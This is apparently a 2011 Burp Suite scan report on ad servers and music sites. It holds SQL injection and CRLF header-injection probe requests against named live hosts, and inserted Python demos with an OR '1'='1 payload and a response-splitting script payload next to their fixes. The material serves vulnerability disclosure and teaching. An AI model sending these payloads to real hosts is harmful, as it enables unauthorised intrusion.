12.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

12.2. http://ads.adbrite.com/adserver/vdi/742697

12.3. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

12.4. http://api.twitter.com/1/statuses/user_timeline.json

12.5. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

12.6. http://ib.adnxs.com/ttj

12.7. http://oads.mochila.com/openx/www/delivery/ajs.php

12.8. http://www.apture.com/js/apture.js

12.9. http://www.facebook.com/plugins/like.php

12.10. http://www.facebook.com/plugins/likebox.php

13. Cross-domain POST

13.1. http://asthmatickitty.com/

13.2. http://asthmatickitty.com/news.php

13.3. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

13.4. http://www.nme.com/news/sufjan-stevens/56527

14. SSL cookie without secure flag set

14.1. https://www.ccnow.com/cgi-local/cart.cgi

14.2. https://www.ccnow.com/cgi-local/checkout.cgi

14.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

15. Cross-domain Referer leakage

15.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

15.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

15.3. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

15.4. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

15.5. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

15.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

15.7. http://ad.yieldmanager.com/iframe3

15.8. http://ad.yieldmanager.com/iframe3

15.9. http://admeld.adnxs.com/usersync

15.10. http://ads.pointroll.com/PortalServe/

15.11. http://ads.revsci.net/adserver/ako

15.12. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

15.13. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

15.14. http://cas.clickability.com/cas/cas.js

15.15. http://cas.clickability.com/cas/cas.js

15.16. http://cas.clickability.com/cas/cas.js

15.17. http://cas.clickability.com/cas/cas.js

15.18. http://cas.clickability.com/cas/cas.js

15.19. http://cas.clickability.com/cas/cas.js

15.20. http://choices.truste.com/ca

15.21. http://choices.truste.com/ca

15.22. http://cm.g.doubleclick.net/pixel

15.23. http://cm.g.doubleclick.net/pixel

15.24. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

15.25. http://ib.adnxs.com/ab

15.26. http://ib.adnxs.com/if

15.27. http://ib.adnxs.com/if

15.28. http://ib.adnxs.com/ptj

15.29. http://imp.fetchback.com/serve/fb/imp

15.30. http://media.adfrontiers.com/pq

15.31. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

15.32. http://mf.sitescout.com/disp

15.33. http://tag.contextweb.com/TagPublish/getad.aspx

15.34. http://www.ccnow.com/cgi-local/cart.cgi

15.35. http://www.ccnow.com/cgi-local/sc_cart.cgi

15.36. http://www.facebook.com/plugins/comments.php

15.37. http://www.facebook.com/plugins/like.php

15.38. http://www.facebook.com/plugins/likebox.php

15.39. http://www.facebook.com/plugins/likebox.php

15.40. http://www.google.com/trends/hottrends

15.41. http://www.google.com/trends/hottrends

15.42. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16. Cross-domain script include

16.1. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

16.2. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

16.3. http://ads.revsci.net/adserver/ako

16.4. http://asthmatickitty.com/

16.5. http://asthmatickitty.com/news.php

16.6. http://ib.adnxs.com/if

16.7. http://ib.adnxs.com/if

16.8. http://media.adfrontiers.com/pq

16.9. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

16.10. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

16.11. http://tag.contextweb.com/TagPublish/getad.aspx

16.12. http://www.ccnow.com/cgi-local/cart.cgi

16.13. http://www.ccnow.com/cgi-local/sc_cart.cgi

16.14. https://www.ccnow.com/cgi-local/cart.cgi

16.15. https://www.ccnow.com/cgi-local/checkout.cgi

16.16. https://www.ccnow.com/cgi-local/sc_cart.cgi

16.17. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

16.18. http://www.clashmusic.com/user/a

16.19. http://www.clashmusic.com/user/password

16.20. http://www.clashmusic.com/user/register

16.21. http://www.facebook.com/plugins/comments.php

16.22. http://www.facebook.com/plugins/like.php

16.23. http://www.facebook.com/plugins/likebox.php

16.24. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

16.25. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

16.26. http://www.nme.com/news/sufjan-stevens/56527

16.27. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

16.28. http://www.orlandosentinel.com/business/transparent

16.29. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16.30. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

17. File upload functionality

18. TRACE method is enabled

18.1. http://alvenda.122.2o7.net/

18.2. http://ie-stat.bmmetrix.com/

18.3. http://imp.fetchback.com/

18.4. http://ipcmedia.122.2o7.net/

18.5. http://optimized-by.rubiconproject.com/

18.6. http://secure-au.imrworldwide.com/

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/742697

19.2. http://asthmatickitty.com/

19.3. http://asthmatickitty.com/news.php

19.4. http://cdn11.surphace.com/javascript/omniture_h15.js

19.5. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

19.6. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

19.7. http://w.sharethis.com/button/buttons.js

19.8. http://widgets.twimg.com/j/2/widget.css

19.9. http://widgets.twimg.com/j/2/widget.js

19.10. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

19.11. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

19.12. http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

19.13. http://www.floridatoday.com/odygel/lib/legacy/GDN/GDNpreload.js

19.14. http://www.floridatoday.com/odygel/lib/userauth/validateform.js

19.15. http://www.indianasnewscenter.com/includes/granite_js_lib.js

19.16. http://www.irishtimes.com/js/s_code.js

19.17. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

19.18. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

20. Private IP addresses disclosed

20.1. http://api.facebook.com/restserver.php

20.2. http://connect.facebook.net/en_GB/all.js

20.3. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/uBEmPS-MH2t.js

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/qWIGt6WPRA1.js

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/dMZead4v66-.js

20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/RxZwFAf4oY9.js

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

20.12. http://www.facebook.com/extern/login_status.php

20.13. http://www.facebook.com/extern/login_status.php

20.14. http://www.facebook.com/extern/login_status.php

20.15. http://www.facebook.com/extern/login_status.php

20.16. http://www.facebook.com/extern/login_status.php

20.17. http://www.facebook.com/plugins/comments.php

20.18. http://www.facebook.com/plugins/comments.php

20.19. http://www.facebook.com/plugins/like.php

20.20. http://www.facebook.com/plugins/like.php

20.21. http://www.facebook.com/plugins/like.php

20.22. http://www.facebook.com/plugins/like.php

20.23. http://www.facebook.com/plugins/like.php

20.24. http://www.facebook.com/plugins/like.php

20.25. http://www.facebook.com/plugins/like.php

20.26. http://www.facebook.com/plugins/like.php

20.27. http://www.facebook.com/plugins/like.php

20.28. http://www.facebook.com/plugins/like.php

20.29. http://www.facebook.com/plugins/like.php

20.30. http://www.facebook.com/plugins/like.php

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.facebook.com/plugins/like.php

20.33. http://www.facebook.com/plugins/like.php

20.34. http://www.facebook.com/plugins/like.php

20.35. http://www.facebook.com/plugins/like.php

20.36. http://www.facebook.com/plugins/like.php

20.37. http://www.facebook.com/plugins/like.php

20.38. http://www.facebook.com/plugins/like.php

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.facebook.com/plugins/like.php

20.41. http://www.facebook.com/plugins/like.php

20.42. http://www.facebook.com/plugins/like.php

20.43. http://www.facebook.com/plugins/like.php

20.44. http://www.facebook.com/plugins/like.php

20.45. http://www.facebook.com/plugins/like.php

20.46. http://www.facebook.com/plugins/like.php

20.47. http://www.facebook.com/plugins/likebox.php

20.48. http://www.facebook.com/plugins/likebox.php

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

22.2. http://ad.au.doubleclick.net/ad/N799.WhistleOut/B5381461.80

22.3. http://adserver.adtech.de/addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

22.4. http://adserverams.adtech.de/adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

22.5. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

22.6. http://cspix.media6degrees.com/orbserv/hbpix

22.7. http://edge.viagogo.co.uk/feeds/widget.ashx

22.8. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

22.9. http://ie-stat.bmmetrix.com/V13a

22.10. http://imp.fetchback.com/serve/fb/adtag.js

22.11. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

22.12. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

22.13. http://l.addthiscdn.com/live/t00/250lo.gif

22.14. http://l.alvenda.net/e

22.15. http://p.addthis.com/pixel

22.16. http://s0.2mdn.net/dot.gif

22.17. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

22.18. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.19. http://va.px.invitemedia.com/pixel

22.20. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

22.21. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

23. Cacheable HTTPS response

23.1. https://www.ccnow.com/cgi-local/cart.cgi

23.2. https://www.ccnow.com/cgi-local/checkout.cgi

23.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

23.4. https://www.ccnow.com/favicon.ico

24. HTML does not specify charset

24.1. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

24.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

24.3. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

24.4. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

24.5. http://ad.yieldmanager.com/iframe3

24.6. http://ads.pointroll.com/PortalServe/

24.7. http://asthmatickitty.com/

24.8. http://asthmatickitty.com/news.php

24.9. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

24.10. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.12. http://cdn.apture.com/media/html/aptureLoadIframe.html

24.13. http://content.pulse360.com/cgi-bin/context.cgi

24.14. http://cookie.alvenda.com/v2_1/code/ExtractCookie.html

24.15. http://dx.nme.com/ifrm.html

24.16. http://media.adfrontiers.com/pq

24.17. http://mediacdn.disqus.com/1304703476/build/system/def.html

24.18. http://mediacdn.disqus.com/1304703476/build/system/reply.html

24.19. http://mediacdn.disqus.com/1304703476/build/system/upload.html

24.20. http://ping.chartbeat.net/ping

24.21. http://pixel.invitemedia.com/data_sync

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. http://wd.sharethis.com/api/getCount2.php

24.24. http://widgets.surphace.com/partner/omniture/sphereomni_api.php

24.25. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

24.26. http://www.ccnow.com/cgi-local/cart.cgi

24.27. https://www.ccnow.com/cgi-local/cart.cgi

24.28. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

24.29. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

24.30. http://www.nme.com/hotspot/channel/news

24.31. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

24.32. http://www.sufjan.com/

24.33. http://www.surphace.com/ads/rubicon_orlandosentinel

25. Content type incorrectly stated

25.1. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

25.2. http://ads.pointroll.com/PortalServe/

25.3. http://ar.voicefive.com/b/rc.pli

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.5. http://cdn.apture.com/media/searchfilter.khtml.v30596971.js

25.6. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

25.7. http://content.pulse360.com/cgi-bin/context.cgi

25.8. http://event.adxpose.com/event.flow

25.9. http://imp.fetchback.com/serve/fb/adtag.js

25.10. http://l.apture.com/v3/

25.11. http://mediacdn.disqus.com/1304703476/fonts/disqus-webfont.woff

25.12. http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg

25.13. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81

25.14. http://wd.sharethis.com/api/getCount2.php

25.15. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

25.16. http://www.ccnow.com/cgi-local/cart.cgi

25.17. http://www.ccnow.com/favicon.ico

25.18. http://www.ccnow.com/images/cart/ccnowcart_gray.jpg

25.19. https://www.ccnow.com/cgi-local/cart.cgi

25.20. https://www.ccnow.com/favicon.ico

25.21. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.floridatoday.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

25.24. http://www.nme.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://pcm1.map.pulsemgr.com/uds/pc

26.3. http://www.meebo.com/cmd/tc

27. SSL certificate



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://l.alvenda.net/e [e parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The e parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the e parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression'&so=js-placement&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) " Position: 181
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1506
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) "
Position: 181</title>
</head>
...[SNIP]...

1.2. http://l.alvenda.net/e [so parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The so parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the so parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression&so=js-placement'&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) " Position: 188
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1510
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) "
Position: 188</title>
</hea
...[SNIP]...

1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/blogs'/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 14:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /music/blogs''/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
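The three findings above all rest on the same mechanism: a quote character from the request reaching the SQL parser as part of the query text. The script below is an added example (not code from the report or from the affected sites) that reproduces it with an in-memory SQLite table standing in for the unknown backend; the schema and the `kind IN ( '...' )` query shape are assumptions suggested only by the error text "'IMPRESSION'' )" in 1.1. It shows the concatenated query failing on a single quote but not on two (the heuristic the scanner relied on in 1.3), a payload that changes the query's logic rather than just breaking it, and the parameterised form from the remediation background treating the same inputs as plain data.

```python
import sqlite3

# Constructed stand-in for the event-logging backend: an in-memory SQLite table.
# This is an assumption for illustration; the real schema behind l.alvenda.net/e is unknown.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, kind TEXT, source TEXT)")
    conn.executemany(
        "INSERT INTO events (kind, source) VALUES (?, ?)",
        [("IMPRESSION", "JS-PLACEMENT"), ("IMPRESSION", "EMAIL"), ("CLICK", "JS-PLACEMENT")],
    )
    return conn

def count_concatenated(conn, e):
    # Vulnerable pattern: the request parameter is upper-cased and pasted into the
    # query text, which is what the error fragment "'IMPRESSION'' )" in 1.1 suggests.
    sql = "SELECT COUNT(*) FROM events WHERE kind IN ( '%s' )" % e.upper()
    return conn.execute(sql).fetchone()[0]

def count_parameterised(conn, e):
    # Fixed pattern: the query structure is fixed first; the value is bound afterwards
    # and is never parsed as SQL, whatever it contains.
    sql = "SELECT COUNT(*) FROM events WHERE kind IN ( ? )"
    return conn.execute(sql, (e.upper(),)).fetchone()[0]

def probe(fn, conn, value):
    """Run one probe value through fn; return ('ok', count) or ('error', message)."""
    try:
        return ("ok", fn(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    # One quote breaks the concatenated query, two quotes do not (1.3's heuristic),
    # and the OR payload returns every row; the parameterised query is unaffected.
    for value in ("impression", "impression'", "impression''", "x') OR ('1'='1"):
        print("%-20r concatenated=%s parameterised=%s" % (
            value, probe(count_concatenated, db, value), probe(count_parameterised, db, value)))
```

Note that the two-quote probe "succeeds" only because `''` is the SQL escape for a literal quote inside a string; that is exactly why an error that appears with `'` and vanishes with `''` is a reliable sign of string concatenation rather than of a generic input-handling bug.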

2. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
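As an added example (not part of the report), the script below reconstructs the 302 from finding 2.1 as a raw HTTP response so the effect of a CR LF in the copied path segment can be seen directly, then applies the validation just described. The response layout is simplified from the one captured in 2.1; the Set-Cookie and response-splitting payloads are constructed for illustration and were not observed against ad.doubleclick.net.

```python
import re
from urllib.parse import unquote

# The probe Burp sent in finding 2.1, URL-decoded: %0d%0a becomes a real CR LF.
PROBE = unquote("334dd%0d%0a6d942ec9952")

# Constructed attacker payloads (not from the report): one injects a header, the
# other terminates the header block early and supplies a second, fake response.
COOKIE_PAYLOAD = "334dd\r\nSet-Cookie: id=attacker-chosen; domain=doubleclick.net"
SPLIT_PAYLOAD = ("334dd\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
                 "<script>alert(1)</script>")

def vulnerable_redirect(segment):
    # Reproduces the affected pattern: the first path segment is copied straight
    # into the Location header of the 302 without any filtering.
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Content-Type: text/html\r\n"
            "Location: http://static.2mdn.net/" + segment + "/N3671.burst/B5229711.3\r\n"
            "\r\n"
            "<h1>Error 302 Moved Temporarily</h1>")

def header_names(raw_response):
    """Header field names exactly as a client or caching proxy would parse them."""
    head = raw_response.partition("\r\n\r\n")[0]
    return [line.split(":", 1)[0].strip() for line in head.split("\r\n")[1:]]

def body_after_headers(raw_response):
    """Whatever follows the first blank line: the message body as a client sees it."""
    return raw_response.partition("\r\n\r\n")[2]

_ALLOWED = re.compile(r"\A[A-Za-z0-9._-]{1,64}\Z")

def validate_header_value(value):
    # Reject any control character (ASCII < 0x20, plus DEL), then apply a short
    # allow-list, as the remediation text above recommends.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    if not _ALLOWED.match(value):
        raise ValueError("header value outside the allowed alphabet")
    return value

def is_safe_header_value(value):
    try:
        validate_header_value(value)
        return True
    except ValueError:
        return False

def safe_redirect(segment):
    return vulnerable_redirect(validate_header_value(segment))

if __name__ == "__main__":
    for name, payload in (("probe", PROBE), ("cookie", COOKIE_PAYLOAD), ("split", SPLIT_PAYLOAD)):
        raw = vulnerable_redirect(payload)
        print(name, header_names(raw), repr(body_after_headers(raw)[:40]))
        print(name, "accepted by validator:", is_safe_header_value(payload))
```

The scanner's probe only adds a junk line, which is enough to prove the point; the constructed payloads show the two consequences the background text describes, an attacker-chosen header and a complete second response that a proxy may cache under a URL of the attacker's choosing.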


2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 334dd%0d%0a6d942ec9952 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /334dd%0d%0a6d942ec9952/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
